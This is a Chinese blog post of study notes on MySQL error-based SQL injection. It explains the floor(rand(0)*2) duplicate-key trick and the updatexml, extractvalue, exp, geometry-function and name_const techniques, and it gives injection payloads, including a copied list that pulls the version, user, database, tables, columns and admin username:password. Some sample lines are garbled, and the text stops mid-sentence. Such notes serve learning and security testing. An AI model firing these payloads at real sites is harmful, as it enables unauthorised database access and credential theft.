<!DOCTYPE html>
<html lang="en">
    <!-- title -->
<!-- keywords -->
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="author" content="温柔刀">
    <meta name="renderer" content="webkit">
    <meta name="copyright" content="温柔刀">
        <meta name="keywords" content="hexo,hexo-theme,hexo-blog">
    <meta name="description" content="">
    <meta name="description" content="SQL报错注入 - Von的博客 | Von Blog SQL–报错注入(join无列名注入)_join注入-CSDN博客 MySQL报错注入笔记 – 「配枪朱丽叶。」   主键重复报错floor()  向下取整，类似于⌊x⌋ rand(0)和 rand()  只要括号里输入的数字是一样的，rand(数字)的结果就会一直一样。 rang()生成一个位于 0 到 1 之间的数字。  一条常见的查询语">
<meta property="og:type" content="article">
<meta property="og:title" content="SQL报错注入整理">
<meta property="og:url" content="http://example.com/2025/07/28/SQL%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5%E6%95%B4%E7%90%86/index.html">
<meta property="og:site_name" content="三重门">
<meta property="og:description" content="SQL报错注入 - Von的博客 | Von Blog SQL–报错注入(join无列名注入)_join注入-CSDN博客 MySQL报错注入笔记 – 「配枪朱丽叶。」   主键重复报错floor()  向下取整，类似于⌊x⌋ rand(0)和 rand()  只要括号里输入的数字是一样的，rand(数字)的结果就会一直一样。 rang()生成一个位于 0 到 1 之间的数字。  一条常见的查询语">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2025/png/55662681/1753673626474-38978213-796e-46eb-8523-3160da62bc76.png">
<meta property="article:published_time" content="2025-07-28T13:28:08.000Z">
<meta property="article:modified_time" content="2025-08-16T06:38:20.698Z">
<meta property="article:author" content="温柔刀">
<meta property="article:tag" content="报错注入">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://cdn.nlark.com/yuque/0/2025/png/55662681/1753673626474-38978213-796e-46eb-8523-3160da62bc76.png">
    <meta http-equiv="Cache-control" content="no-cache">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <link rel="icon" href="/assets/favicon.ico">
    <title>SQL报错注入整理 · Gentle_knife&#39;s Studio</title>
    <!-- /*! loadCSS. [c]2017 Filament Group, Inc. MIT License */
/* This file is meant as a standalone workflow for
- testing support for link[rel=preload]
- enabling async CSS loading in browsers that do not support rel=preload
- applying rel preload css once loaded, whether supported or not.
*/ -->
<script>
    (function (w) {
        'use strict'
        // rel=preload support test
        if (!w.loadCSS) {
            w.loadCSS = function () {}
        }
        // define on the loadCSS obj
        var rp = (loadCSS.relpreload = {})
        // rel=preload feature support test
        // runs once and returns a function for compat purposes
        rp.support = (function () {
            var ret
            try {
                ret = w.document.createElement('link').relList.supports('preload')
            } catch (e) {
                ret = false
            }
            return function () {
                return ret
            }
        })()

        // if preload isn't supported, get an asynchronous load by using a non-matching media attribute
        // then change that media back to its intended value on load
        rp.bindMediaToggle = function (link) {
            // remember existing media attr for ultimate state, or default to 'all'
            var finalMedia = link.media || 'all'

            function enableStylesheet() {
                link.media = finalMedia
            }

            // bind load handlers to enable media
            if (link.addEventListener) {
                link.addEventListener('load', enableStylesheet)
            } else if (link.attachEvent) {
                link.attachEvent('onload', enableStylesheet)
            }

            // Set rel and non-applicable media type to start an async request
            // note: timeout allows this to happen async to let rendering continue in IE
            setTimeout(function () {
                link.rel = 'stylesheet'
                link.media = 'only x'
            })
            // also enable media after 3 seconds,
            // which will catch very old browsers (android 2.x, old firefox) that don't support onload on link
            setTimeout(enableStylesheet, 3000)
        }

        // loop through link elements in DOM
        rp.poly = function () {
            // double check this to prevent external calls from running
            if (rp.support()) {
                return
            }
            var links = w.document.getElementsByTagName('link')
            for (var i = 0; i < links.length; i++) {
                var link = links[i]
                // qualify links to those with rel=preload and as=style attrs
                if (
                    link.rel === 'preload' &&
                    link.getAttribute('as') === 'style' &&
                    !link.getAttribute('data-loadcss')
                ) {
                    // prevent rerunning on link
                    link.setAttribute('data-loadcss', true)
                    // bind listeners to toggle media back
                    rp.bindMediaToggle(link)
                }
            }
        }

        // if unsupported, run the polyfill
        if (!rp.support()) {
            // run once at least
            rp.poly()

            // rerun poly on an interval until onload
            var run = w.setInterval(rp.poly, 500)
            if (w.addEventListener) {
                w.addEventListener('load', function () {
                    rp.poly()
                    w.clearInterval(run)
                })
            } else if (w.attachEvent) {
                w.attachEvent('onload', function () {
                    rp.poly()
                    w.clearInterval(run)
                })
            }
        }

        // commonjs
        if (typeof exports !== 'undefined') {
            exports.loadCSS = loadCSS
        } else {
            w.loadCSS = loadCSS
        }
    })(typeof global !== 'undefined' ? global : this)
</script>

    <style type="text/css">
    @font-face {
        font-family: 'Oswald-Regular';
        src: url("/font/Oswald-Regular.ttf");
    }

    body {
        margin: 0;
    }

    header,
    footer,
    .footer-fixed-btn,
    .sidebar,
    .container,
    .site-intro-meta,
    .toc-wrapper {
        display: none;
    }

    .site-intro {
        position: relative;
        z-index: 3;
        width: 100%;
        /* height: 50vh; */
        overflow: hidden;
    }

    .site-intro-placeholder {
        position: absolute;
        z-index: -2;
        top: 0;
        left: 0;
        width: calc(100% + 300px);
        height: 100%;
        background: repeating-linear-gradient(
            -45deg,
            #444 0,
            #444 80px,
            #333 80px,
            #333 160px
        );
        background-position: center center;
        transform: translate3d(-226px, 0, 0);
        animation: gradient-move 2.5s ease-out 0s infinite;
    }

    @keyframes gradient-move {
        0% {
            transform: translate3d(-226px, 0, 0);
        }
        100% {
            transform: translate3d(0, 0, 0);
        }
    }
</style>

    <link id="stylesheet-fancybox" rel="preload" href="https://cdn.jsdelivr.net/npm/@fancyapps/ui@5.0.36/dist/fancybox/fancybox.css" as="style" onload="this.onload=null;this.rel='stylesheet'">
    <link id="stylesheet-base" rel="preload" href="/css/style.css" as="style" onload="this.onload=null;this.rel='stylesheet'">
    <link id="stylesheet-mobile" rel="preload" href="/css/mobile.css" as="style" onload="this.onload=null;this.rel='stylesheet';this.media='screen and (max-width: 960px)'">
    <link id="stylesheet-theme-dark" rel="preload" href="/css/dark.css" as="style" onload="this.onload=null;this.rel='stylesheet'">
    <link rel="preload" href="https://cdn.jsdelivr.net/npm/jquery@3.6.0/dist/jquery.min.js" as="script">
    <link rel="preload" href="/scripts/main.js" as="script">
    <link rel="preload" href="/font/Oswald-Regular.ttf" as="font" crossorigin>
    <link rel="preload" href="https://at.alicdn.com/t/font_327081_1dta1rlogw17zaor.woff" as="font" crossorigin>
    <!-- algolia -->
    <!-- 百度统计  -->
    <!-- 谷歌统计  -->
    <!-- Google tag (gtag.js) -->
<meta name="generator" content="Hexo 7.3.0"></head>

    <script src="https://cdn.jsdelivr.net/npm/jquery@3.6.0/dist/jquery.min.js"></script>
    <script type="text/javascript">
        if (typeof window.$ == undefined) {
            console.warn('jquery load from jsdelivr failed, will load local script')
            document.write('<script src="/lib/jquery.min.js" />')
        }
    </script>
        <body class="post-body">
        <!-- header -->
        <header class="header header-mobile">
    <!-- top read progress line -->
    <div class="header-element">
        <div class="read-progress"></div>
    </div>
    <!-- sidebar menu button -->
    <div class="header-element">
        <div class="header-sidebar-menu">
            <div style="padding-left: 1px;">&#xe775;</div>
        </div>
    </div>
    <!-- header actions -->
    <div class="header-actions">
        <!-- theme mode switch button -->
        <span class="header-theme-btn header-element">
            <i class="fas fa-adjust"></i>
        </span>
        <!-- back to home page text -->
        <span class="home-link header-element">
            <a href="/">Gentle_knife's Studio.</a>
        </span>
    </div>
    <!-- toggle banner -->
    <div class="banner">
        <div class="blog-title header-element">
            <a href="/">Gentle_knife&#39;s Studio.</a>
        </div>
        <div class="post-title header-element">
            <a href="#" class="post-name">SQL报错注入整理</a>
        </div>
    </div>
</header>

        <!-- fixed footer -->
        <footer class="footer-fixed">
    <!-- donate button -->

    <!-- back to top button -->
    <div class="footer-fixed-btn footer-fixed-btn--hidden back-top">
        <div>&#xe639;</div>
    </div>
</footer>

        <!-- wrapper -->
        <div class="wrapper">
            <div class="site-intro" style="    height:50vh;
">
    <!-- 主页  -->
    <!-- 404页  -->
    <div class="site-intro-placeholder"></div>
    <div class="site-intro-img" style="background-image: url(/intro/1.jpg)"></div>
    <div class="site-intro-meta">
        <!-- 标题  -->
        <h1 class="intro-title">
            <!-- 主页  -->
                SQL报错注入整理
            <!-- 404 -->
        </h1>
        <!-- 副标题 -->
        <p class="intro-subtitle">
            <!-- 主页副标题  -->
            <!-- 404 -->
        </p>
        <!-- 文章页 meta -->
            <div class="post-intros">
                <!-- 文章页标签  -->
                    <div class="post-intro-tags" >
        <a class="post-tag" href="javascript:void(0);" data-tags="报错注入">报错注入</a>
</div>

                <!-- 文章字数统计 -->
                    <div class="post-intro-read">
                        <span>Word count: <span class="post-count word-count">2.1k</span>Reading time: <span class="post-count reading-time">8 min</span></span>
                    </div>
                <div class="post-intro-meta">
                    <!-- 撰写日期 -->
                    <span class="iconfont-archer post-intro-calander">&#xe676;</span>
                    <span class="post-intro-time">2025/07/28</span>
                    <!-- busuanzi -->
                        <span id="busuanzi_container_page_pv" class="busuanzi-pv">
                            <span class="iconfont-archer post-intro-busuanzi">&#xe602;</span>
                            <span id="busuanzi_value_page_pv"></span>
                        </span>
                    <!-- 文章分享 -->
                    <span class="share-wrapper">
                        <span class="iconfont-archer share-icon">&#xe71d;</span>
                        <span class="share-text">Share</span>
                        <ul class="share-list">
                            <li class="iconfont-archer share-qr" data-type="qr">&#xe75b;
                                <div class="share-qrcode"></div>
                            </li>
                            <li class="iconfont-archer" data-type="weibo">&#xe619;</li>
                            <li class="iconfont-archer" data-type="qzone">&#xe62e;</li>
                            <li class="iconfont-archer" data-type="twitter">&#xe634;</li>
                            <li class="iconfont-archer" data-type="facebook">&#xe67a;</li>
                        </ul>
                    </span>
                </div>
            </div>
    </div>
</div>

            <script>
  // get user agent
  function getBrowserVersions() {
    var u = window.navigator.userAgent
    return {
      userAgent: u,
      trident: u.indexOf('Trident') > -1, //IE内核
      presto: u.indexOf('Presto') > -1, //opera内核
      webKit: u.indexOf('AppleWebKit') > -1, //苹果、谷歌内核
      gecko: u.indexOf('Gecko') > -1 && u.indexOf('KHTML') == -1, //火狐内核
      mobile: !!u.match(/AppleWebKit.*Mobile.*/), //是否为移动终端
      ios: !!u.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/), //ios终端
      android: u.indexOf('Android') > -1 || u.indexOf('Linux') > -1, //android终端或者uc浏览器
      iPhone: u.indexOf('iPhone') > -1 || u.indexOf('Mac') > -1, //是否为iPhone或者安卓QQ浏览器
      iPad: u.indexOf('iPad') > -1, //是否为iPad
      webApp: u.indexOf('Safari') == -1, //是否为web应用程序，没有头部与底部
      weixin: u.indexOf('MicroMessenger') == -1, //是否为微信浏览器
      uc: u.indexOf('UCBrowser') > -1, //是否为android下的UC浏览器
    }
  }
  var browser = {
    versions: getBrowserVersions(),
  }
  console.log('userAgent: ' + browser.versions.userAgent)

  // callback
  function fontLoaded() {
    console.log('font loaded')
    if (document.getElementsByClassName('site-intro-meta')) {
      document
        .getElementsByClassName('intro-title')[0]
        .classList.add('intro-fade-in')
      document
        .getElementsByClassName('intro-subtitle')[0]
        .classList.add('intro-fade-in')
      var postIntros = document.getElementsByClassName('post-intros')[0]
      if (postIntros) {
        postIntros.classList.add('post-fade-in')
      }
    }
  }

  // UC不支持跨域，所以直接显示
  function asyncCb() {
    if (browser.versions.uc) {
      console.log('UCBrowser')
      fontLoaded()
    } else {
      WebFont.load({
        custom: {
          families: ['Oswald-Regular'],
        },
        loading: function () {
          // 所有字体开始加载
          // console.log('font loading');
        },
        active: function () {
          // 所有字体已渲染
          fontLoaded()
        },
        inactive: function () {
          // 字体预加载失败，无效字体或浏览器不支持加载
          console.log('inactive: timeout')
          fontLoaded()
        },
        timeout: 5000, // Set the timeout to two seconds
      })
    }
  }

  function asyncErr() {
    console.warn('script load from CDN failed, will load local script')
  }

  // load webfont-loader async, and add callback function
  function async(u, cb, err) {
    var d = document,
      t = 'script',
      o = d.createElement(t),
      s = d.getElementsByTagName(t)[0]
    o.src = u
    if (cb) {
      o.addEventListener(
        'load',
        function (e) {
          cb(null, e)
        },
        false
      )
    }
    if (err) {
      o.addEventListener(
        'error',
        function (e) {
          err(null, e)
        },
        false
      )
    }
    s.parentNode.insertBefore(o, s)
  }

  var asyncLoadWithFallBack = function (arr, success, reject) {
    var currReject = function () {
      reject()
      arr.shift()
      if (arr.length) async(arr[0], success, currReject)
    }

    async(arr[0], success, currReject)
  }

  asyncLoadWithFallBack(
    [
      'https://cdn.jsdelivr.net/npm/webfontloader@1.6.28/webfontloader.min.js',
      'https://cdn.bootcss.com/webfont/1.6.28/webfontloader.js',
      "/lib/webfontloader.min.js",
    ],
    asyncCb,
    asyncErr
  )
</script>

            <img class="loading" src="/assets/loading.svg" style="display: block; margin: 6rem auto 0 auto; width: 6rem; height: 6rem;" alt="loading">
            <div class="container container-unloaded">
                <main class="main post-page">
    <article class="article-entry">
        <p><a target="_blank" rel="noopener" href="https://www.v0n.top/2019/08/12/SQL%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/">SQL报错注入 - Von的博客 | Von Blog</a></p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_74020633/article/details/137156384">SQL–报错注入(join无列名注入)_join注入-CSDN博客</a></p>
<p><a target="_blank" rel="noopener" href="https://www.shawroot.cc/1116.html">MySQL报错注入笔记 – 「配枪朱丽叶。」</a></p>
<meta name="referrer" content="no-referrer" />

<h1 id="主键重复报错"><a href="#主键重复报错" class="headerlink" title="主键重复报错"></a><font style="color:rgb(64, 64, 64);">主键重复报错</font></h1><p><strong>floor()</strong> </p>
<p>向下取整，类似于<font style="color:rgb(31, 31, 31);">⌊x⌋</font></p>
<p><strong><font style="color:rgb(31, 31, 31);">rand(0)和 rand() </font></strong></p>
<p><font style="color:rgb(31, 31, 31);">只要括号里输入的数字是一样的，rand(数字)的结果就会一直一样。</font></p>
<p><font style="color:rgb(31, 31, 31);">rang()生成一个位于 0 到 1 之间的数字。</font></p>
<p><font style="color:rgb(31, 31, 31);"></font></p>
<p><font style="color:rgb(31, 31, 31);">一条常见的查询语句</font></p>
<p><img src="https://cdn.nlark.com/yuque/0/2025/png/55662681/1753673626474-38978213-796e-46eb-8523-3160da62bc76.png"></p>
<p>数据库内部“按行”扫描原数据表，发现一个新的值就添加进去，发现重复的就计数＋1 直到全部读完。</p>
<p>如果我们有以下表：</p>
<table>
<thead>
<tr>
<th>id</th>
<th>username</th>
</tr>
</thead>
<tbody><tr>
<td>1</td>
<td>Alice</td>
</tr>
<tr>
<td>2</td>
<td>Bob</td>
</tr>
<tr>
<td>3</td>
<td>Alice</td>
</tr>
<tr>
<td>4</td>
<td>Carol</td>
</tr>
<tr>
<td>5</td>
<td>Alice</td>
</tr>
<tr>
<td>6</td>
<td>Bob</td>
</tr>
</tbody></table>
<p>那么我们执行这条语句：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SELECT username, COUNT(*) FROM users GROUP BY username;</span><br></pre></td></tr></table></figure>

<p>结果是：</p>
<table>
<thead>
<tr>
<th>username</th>
<th>count(*)</th>
</tr>
</thead>
<tbody><tr>
<td>Alice</td>
<td>3</td>
</tr>
<tr>
<td>Bob</td>
<td>2</td>
</tr>
<tr>
<td>Carol</td>
<td>1</td>
</tr>
</tbody></table>
<blockquote>
<p><font style="color:rgb(64, 64, 64);">那么，他的实现过程是如何的呢？可以联想到group by子句的执行流程，最初时，username-count(<em>)这个数据表是空的，通过一行一行读原数据表中的user字段，如果读到的user在user-count(</em>) 数据表中不存在，就将它插入，并且将对应的count(<em>) 赋为1，如果存在，就将其对应的count(</em>) +1，直至扫完整个数据表。</font></p>
</blockquote>
<p><font style="color:rgb(64, 64, 64);"></font></p>
<p><font style="color:rgb(64, 64, 64);">下面就是一个很有意思的机制，当我们执行这条语句：</font></p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select <span class="title function_">count</span><span class="params">(*)</span> from sqli group by <span class="title function_">floor</span><span class="params">(rand(<span class="number">0</span>)</span>*<span class="number">2</span>);</span><br></pre></td></tr></table></figure>

<p>每一行都会计算floor(rand(0)*2)，结果是 0 或 1，<font style="color:rgb(64, 64, 64);">在使用group by的时候，floor(rand(0)*2)会被执行一次，如果虚表不存在记录，插入虚表的时候会再被执行一次。</font></p>
<blockquote>
<p><font style="color:rgb(64, 64, 64);">1.查询前默认会建立空的虚拟表</font><font style="color:rgb(64, 64, 64);"><br></font><font style="color:rgb(64, 64, 64);">2.取第一条记录，执行floor(rand(0)*2)，发现结果为0(第一次计算),查询虚拟表，发现0的键值不存在，则floor(rand(0)*2)会被再计算一次，结果为1(第二次计算)，插入虚表，这时第一条记录查询完毕</font><font style="color:rgb(64, 64, 64);"><br></font><font style="color:rgb(64, 64, 64);">3.查询第二条记录，再次计算floor(rand(0)*2)，发现结果为1(第三次计算)，查询虚表，发现1的键值存在，所以floor(rand(0)<em>2)不会被计算第二次，直接count(</em>)加1，第二条记录查询完毕</font><font style="color:rgb(64, 64, 64);"><br></font><font style="color:rgb(64, 64, 64);">4.查询第三条记录，再次计算floor(rand(0)*2)，发现结果为0(第4次计算)，查询虚表，发现键值没有0，则数据库尝试插入一条新的数据，在插入数据时floor(rand(0)*2)被再次计算，作为虚表的主键，其值为1(第5次计算)，然而1这个主键已经存在于虚拟表中，而新计算的值也为1(主键键值必须唯一)，所以插入的时候就直接报错了</font><font style="color:rgb(64, 64, 64);"><br></font><font style="color:rgb(64, 64, 64);">5.整个查询过程floor(rand(0)<em>2)被计算了5次，查询原数据表3次，所以这就是为什么数据表中需要3条数据，使用该语句才会报错的原因。</font><font style="color:rgb(64, 64, 64);"><br></font><font style="color:rgb(64, 64, 64);">如果有一个序列开头时0,1,0或者1,0,1，则无论如何都不会报错了，因为虚表开头两个主键会分别是0和1，后面的就直接count(</em>)加1了.</font></p>
</blockquote>
<p>这一段如果看的很乱可以丢给 GPT 帮忙讲一下。</p>
<p>步骤1：查询开始，虚拟表是空的。</p>
<hr>
<p>步骤2：读第一行数据</p>
<ul>
<li>第一次执行 <code>FLOOR(RAND(0)*2)</code>，得到 <strong>0</strong></li>
<li>查虚拟表，发现没有键 0，于是要插入它</li>
<li>但是——在真正插入表的时候，MySQL **又执行了一次 **<code>**FLOOR(RAND(0)*2)**</code>（这是它的实现机制）<ul>
<li>第二次计算结果变成了 <strong>1</strong></li>
</ul>
</li>
<li>所以最终插入的是键 <strong>1</strong></li>
<li>现在虚表是：<code>&#123;1: 1&#125;</code>（表示键为 1 的组，计数为 1）</li>
</ul>
<hr>
<p>步骤3：读第二行数据</p>
<ul>
<li>第三次执行 <code>FLOOR(RAND(0)*2)</code>，得到 <strong>1</strong></li>
<li>查虚拟表：发现已经有键 1，于是把它的计数 +1</li>
<li>虚表变成 <code>&#123;1: 2&#125;</code></li>
</ul>
<hr>
<p>步骤4：读第三行数据</p>
<ul>
<li>第四次执行 <code>FLOOR(RAND(0)*2)</code>，得到 <strong>0</strong></li>
<li>查虚拟表，没有键 0，准备插入</li>
<li>插入时再次计算 <code>FLOOR(RAND(0)*2)</code>（第 5 次），结果又是 <strong>1</strong></li>
<li>但 1 已经存在于表中了 → ❗️违反了主键唯一性 → 触发 <strong>报错！</strong></li>
</ul>
<p> <strong>所以至少需要三条数据才能报错，且有几率不会报错。</strong><font style="color:rgb(64, 64, 64);">如果有一个序列开头时0,1,0或者1,0,1，则无论如何都不会报错了，因为虚表开头两个主键会分别是0和1，后面的就直接count(*)加1了.</font></p>
<p>rand()*2 由于是随机的，所以我们用它的时候有可能前两个刚好一个 0，一个 1 之后的记录只会 <code>count(*) +1</code>，**不会再试图插入新键，**所以不会触发主键冲突，不会报错。</p>
<h1 id="xpath语法错误报错（-mysql5-1-5"><a href="#xpath语法错误报错（-mysql5-1-5" class="headerlink" title="xpath语法错误报错（&gt;mysql5.1.5)"></a><font style="color:rgb(64, 64, 64);">xpath语法错误报错（&gt;mysql5.1.5)</font></h1><p>这两个函数是用来 XML 查询和修改的，记住都能报错了。</p>
<h2 id="updatexml-报错"><a href="#updatexml-报错" class="headerlink" title="updatexml()报错"></a>updatexml()报错</h2><p>updatexml(XML_document, XPath_string, new_value)</p>
<p>updatexml(XML 文档名称, XPath 格式的字符串, 替换数据)</p>
<p>因为第二个参数要求 Xpath 格式，所以我们传一个不是这个格式的就会报错，大多用十六进制的<code>~</code>，也就是 0x7e，我们把需要的数据和报错的连起来就会儿一起回显， 也就是<code>CONCAT(0x7e, (SELECT database()), 0x7e)</code>首尾随便填。</p>
<p>从配枪朱丽叶搬运来的 payload:</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> pname,pagefrompersonwherepwd<span class="operator">=</span><span class="string">&#x27;111&#x27;</span>andupdatexml(<span class="number">1</span>,concat(<span class="number">0x7e</span>,(selectdatabase()),<span class="number">0x7e</span>),<span class="number">1</span>);</span><br><span class="line"></span><br><span class="line">爆数据库版本信息</span><br><span class="line">?id<span class="operator">=</span><span class="number">1</span> <span class="keyword">and</span> updatexml(<span class="number">1</span>,concat(<span class="number">0x7e</span>,(<span class="keyword">SELECT</span> @<span class="variable">@version</span>),<span class="number">0x7e</span>),<span class="number">1</span>)</span><br><span class="line">链接用户</span><br><span class="line">?id<span class="operator">=</span><span class="number">1</span> <span class="keyword">and</span> updatexml(<span class="number">1</span>,concat(<span class="number">0x7e</span>,(<span class="keyword">SELECT</span> <span class="keyword">user</span>()),<span class="number">0x7e</span>),<span class="number">1</span>)</span><br><span class="line">链接数据库</span><br><span class="line">?id<span class="operator">=</span><span class="number">1</span> <span class="keyword">and</span> updatexml(<span class="number">1</span>,concat(<span class="number">0x7e</span>,(<span class="keyword">SELECT</span> database()),<span class="number">0x7e</span>),<span class="number">1</span>)</span><br><span class="line">爆库</span><br><span class="line">?id<span class="operator">=</span><span class="number">1</span> <span class="keyword">and</span> updatexml(<span class="number">1</span>,concat(<span class="number">0x7e</span>,(<span class="keyword">SELECT</span> <span class="keyword">distinct</span> concat(<span class="number">0x7e</span>, (<span class="keyword">select</span> schema_name),<span class="number">0x7e</span>) <span class="keyword">FROM</span> admin limit <span class="number">0</span>,<span class="number">1</span>),<span class="number">0x7e</span>),<span class="number">1</span>)</span><br><span class="line">爆表</span><br><span class="line">?id<span class="operator">=</span><span class="number">1</span> <span class="keyword">and</span> updatexml(<span class="number">1</span>,concat(<span class="number">0x7e</span>,(<span class="keyword">SELECT</span> <span class="keyword">distinct</span> concat(<span class="number">0x7e</span>, (<span class="keyword">select</span> table_name),<span class="number">0x7e</span>) <span class="keyword">FROM</span> admin limit <span class="number">0</span>,<span class="number">1</span>),<span class="number">0x7e</span>),<span class="number">1</span>)</span><br><span class="line">爆字段</span><br><span class="line">?id<span class="operator">=</span><span class="number">1</span> <span class="keyword">and</span> updatexml(<span class="number">1</span>,concat(<span class="number">0x7e</span>,(<span class="keyword">SELECT</span> <span class="keyword">distinct</span> concat(<span class="number">0x7e</span>, (<span class="keyword">select</span> column_name),<span class="number">0x7e</span>) <span class="keyword">FROM</span> admin limit <span class="number">0</span>,<span class="number">1</span>),<span class="number">0x7e</span>),<span class="number">1</span>)</span><br><span class="line">爆字段内容</span><br><span class="line">?id<span class="operator">=</span><span class="number">1</span> <span class="keyword">and</span> updatexml(<span class="number">1</span>,concat(<span class="number">0x7e</span>,(<span class="keyword">SELECT</span> <span class="keyword">distinct</span> concat(<span class="number">0x23</span>,username,<span class="number">0x3a</span>,password,<span class="number">0x23</span>) <span class="keyword">FROM</span> admin limit <span class="number">0</span>,<span class="number">1</span>),<span class="number">0x7e</span>),<span class="number">1</span>)</span><br></pre></td></tr></table></figure>

<p>@@versions 是<strong>MySQL 内置的全局变量</strong>，它的作用是：<strong>返回当前 MySQL 数据库的版本号。</strong></p>
<h2 id="extractvalue-报错"><a href="#extractvalue-报错" class="headerlink" title="extractvalue()报错"></a><font style="color:rgb(64, 64, 64);">extractvalue()报错</font></h2><p>extractvalue(XML_document, xpath_string)</p>
<p>extractvalue(XML 文档名称, XPath 格式的字符串)</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select pname,page from person where pwd = &#x27;111&#x27; and (extractvalue(&#x27;hhhhhhh&#x27;,concat(0x7e,substring(hex((select database())),1,20))));</span><br></pre></td></tr></table></figure>

<p>长度限制 32 位，超过可以用</p>
<h1 id="数据溢出报错"><a href="#数据溢出报错" class="headerlink" title="数据溢出报错"></a><font style="color:#000000;">数据溢出报错</font></h1><h2 id="双精度溢出报错"><a href="#双精度溢出报错" class="headerlink" title="双精度溢出报错"></a><font style="color:#000000;">双精度溢出报错</font></h2><p><font style="color:#000000;">Exp函数返回e的幂次方。在MySQL中。当传入的参数&gt;&#x3D;710会报错。并且会返回报错信息。利用方法如下:</font></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select exp(~(select*from(select user())x));</span><br></pre></td></tr></table></figure>

<p><font style="color:#000000;"><del>表示按位取反操作，通俗的讲就是能把一个很小的数变成一个很大的数。比如</del>0&#x3D;18446744073709551615，从而达到溢出的效果。</font></p>
<h1 id="整型溢出报错"><a href="#整型溢出报错" class="headerlink" title="整型溢出报错"></a><font style="color:#000000;">整型溢出报错</font></h1><p><font style="color:#000000;"></font></p>
<h1 id="几何函数报错-5-7-17-5-5-48"><a href="#几何函数报错-5-7-17-5-5-48" class="headerlink" title="几何函数报错(5.7.17-5.5.48)"></a><font style="color:#000000;">几何函数报错(</font><font style="color:#000000;">5.7.17-5.5.48)</font></h1><blockquote>
<p><font style="color:#000000;">mysql有些几何函数，例如geometrycollection()，multipoint()，polygon()，multipolygon()，linestring()，multilinestring()，这些函数对参数要求是形如(1 2,3 3,2 2 1)这样几何数据，如果不满足要求，则会报错。</font></p>
</blockquote>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">multipoint((<span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span>(<span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span>(<span class="keyword">select</span> <span class="keyword">user</span>())a)b));</span><br></pre></td></tr></table></figure>

<h1 id="列名重复报错（Mysql-5-0-12-5-0-51）"><a href="#列名重复报错（Mysql-5-0-12-5-0-51）" class="headerlink" title="列名重复报错（Mysql 5.0.12-5.0.51）"></a><font style="color:#000000;">列名重复报错</font><font style="color:#000000;">（Mysql 5.0.12-5.0.51）</font></h1><h2 id="name-const"><a href="#name-const" class="headerlink" title="name_const()"></a><font style="color:#000000;">name_const()</font></h2><p><a target="_blank" rel="noopener" href="https://www.sjkjc.com/mysql-ref/name_const/">MySQL NAME_CONST() 函数使用指南</a></p>
<p><font style="color:#000000;">name constant 创建一个带有名字的常量值列。</font></p>
<p><font style="color:#000000;">NAME_CONST(列名, 值)&#x3D; SELECT 值 AS 列名</font></p>
<p><font style="color:#000000;">当我们执行：</font></p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">SELECT</span> name_const(version(),<span class="number">1</span>);</span><br></pre></td></tr></table></figure>

<p><font style="color:#000000;">会返回一个列名为 </font><code>&lt;font style=&quot;color:#000000;&quot;&gt;abc&lt;/font&gt;</code><font style="color:#000000;">，值为 </font><code>&lt;font style=&quot;color:#000000;&quot;&gt;123&lt;/font&gt;</code><font style="color:#000000;"> 的一列：</font></p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="operator">+</span><span class="comment">--------+</span></span><br><span class="line"><span class="operator">|</span> <span class="number">5.7</span><span class="number">.20</span> <span class="operator">|</span></span><br><span class="line"><span class="operator">+</span><span class="comment">--------+</span></span><br><span class="line"><span class="operator">|</span>      <span class="number">1</span> <span class="operator">|</span></span><br><span class="line"><span class="operator">+</span><span class="comment">--------+</span></span><br></pre></td></tr></table></figure>

<p><font style="color:#000000;"></font></p>
<p><font style="color:#000000;">如果列名重复，MYSQL 会报错。</font></p>
<p><font style="color:#000000;">示例 payload：</font></p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> (<span class="keyword">select</span> name_const((<span class="keyword">select</span> database()),<span class="number">1</span>),name_const((<span class="keyword">select</span> database()),<span class="number">1</span>))a;</span><br></pre></td></tr></table></figure>

<p><font style="color:#000000;">外面包一层</font><code>&lt;font style=&quot;color:#000000;&quot;&gt;select * from&lt;/font&gt;</code><font style="color:#000000;">是模拟实际情况，也就是说 </font><code>&lt;font style=&quot;color:#000000;&quot;&gt;SELECT * FROM (payload) AS a&lt;/font&gt;</code><font style="color:#000000;">这里的 payload 是</font></p>
